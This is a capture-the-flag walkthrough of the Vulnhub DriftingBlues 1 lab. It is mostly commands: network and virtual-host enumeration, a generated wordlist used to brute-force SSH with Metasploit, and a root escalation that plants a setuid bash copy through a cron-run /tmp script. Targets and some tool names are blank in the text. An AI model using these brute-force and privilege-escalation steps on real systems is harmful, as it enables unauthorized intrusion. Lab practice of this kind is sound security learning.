blues guitar srv

Vulnhub – Driftingblues 1 – Walkthrough – Writeup

We are going to exploit the driftingblues1 machine of Vulnhub. Our goal is to capture user and root flags. Also, make sure to check out the walkthroughs on the harry potter series.



fping -aqg


ports=$(nmap -p- --min-rate=1000 -T4 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV

gobuster dir

gobuster dir -u -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

We have secret.html and index.html files. So, we can open them in browsers or use curl for the sake of saving time.



There is an email ` So, we might speculate that there is a user sheryl and the hostname of the server is We have to add that to hosts file. Meanwhile, let’s find some other information from the page.

echo L25vdGVmb3JraW5nZmlzaC50eHQ= | base64 -d 

Information gathered from the page:

  1. The hostname is
  2. There are two users eric and sheryl.
  3. There is another path in the URL /noteforkingfish.txt.

Let’s check the path /secret.html.


It just tells us to dig deeper. We will!

Add to hosts file

sudo vi /etc/hosts

Open /noteforkingfish.txt


I am afraid now seeing these Ook messages with different punctuations. Maybe it’s some encoded message. We will search the internet for this.

I used another website to decode the message.

This means, we haven’t yet identified the secret location which seems to be some subdomain of We can enumerate virtual hosts using gobuster.

gobuster – vhost

gobuster vhost -u --wordlist /usr/share/wordlists/dirb/common.txt

We found out a vhost Hence, we will also be adding this host to our hosts file.

sudo vi /etc/hosts

Now, we will curl to the newly found url.


Let’s enumerate on the this host using ZAP or nikto whichever you feel comfortable with.

nikto -h

We saw that /ssh_cred.txt is giving us 200 OK status. Let’s visit that file from firefox.

Now, we know the format of the password. However, there needs to be a digit at the end of it. So, we have to brute-force to get entry. For this, we can simply create a wordlist using a script (bash or python or any) or manually whichever is faster for you.

for i in {0..9}; do echo 1<snip>y${i};done | tee wordlist

Also, during our initial enumeration we found out there are two users – eric and sheryl. Hence, we are going to perform brute-force for these users using metasploit framework.


use auxiliary/scanner/ssh/ssh_login
set username eric
set pass_file wordlist
set rhosts
set verbose true

We found out the password of user eric.

Privilege User – eric

Now, we can do ssh with the credentials.

ssh eric@

Privilege Root

I will be using my two favourite tools, and pspy to enumerate further. does a Linux enumeration whereas pspy does unthenticated process snooping. For that to work, you have to create server on the local machine and serve those file.

On attacker (local) machine:

python -m http.server 8080

On target machine:

./ | tee output
chmod +x
chmod +x pspy64

We found out the cron job. Also, there might be another vulnerability in sudo version.



On running pspy64 we found out that there is a backup script running every minute and also it is invoking another script from /tmp directory.

Now, let’s examine the script.

cat /var/backups/

The file which we saw earlier in the enumeration is a result of this script. Also, the developer has included a backdoor in the script. Now, it’s easy to get another shell, or reverse shell, or we can add ssh entry, or we can also change the password of the root user. We have infinite possibilities. For this, we just have to update /tmp/emergency file and make it executable.

Add a custom bash

nano /tmp/emergency
chmod +x /tmp/emergency

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

The above line copies the binary bash and gives the setuid permission to it. Therefore, when root executes this line, we will get a copy of bash with setuid permission of root. Then, we can simply put -p flag and impersonate root.


Now, we can try to impersonate the root user.

/tmp/bash -p

We got the root access.

cat /root/root.txt

We got the root flag.


I learnt about Ook encoding from this machine. Other than that, we got to use gobuster vhost enumeration. Since the machine was labelled as easy, it is easy. I will do driftingblues2 soon.

5 2 votes
Article Rating
Notify of
1 Comment
Newest Most Voted
Inline Feedbacks
View all comments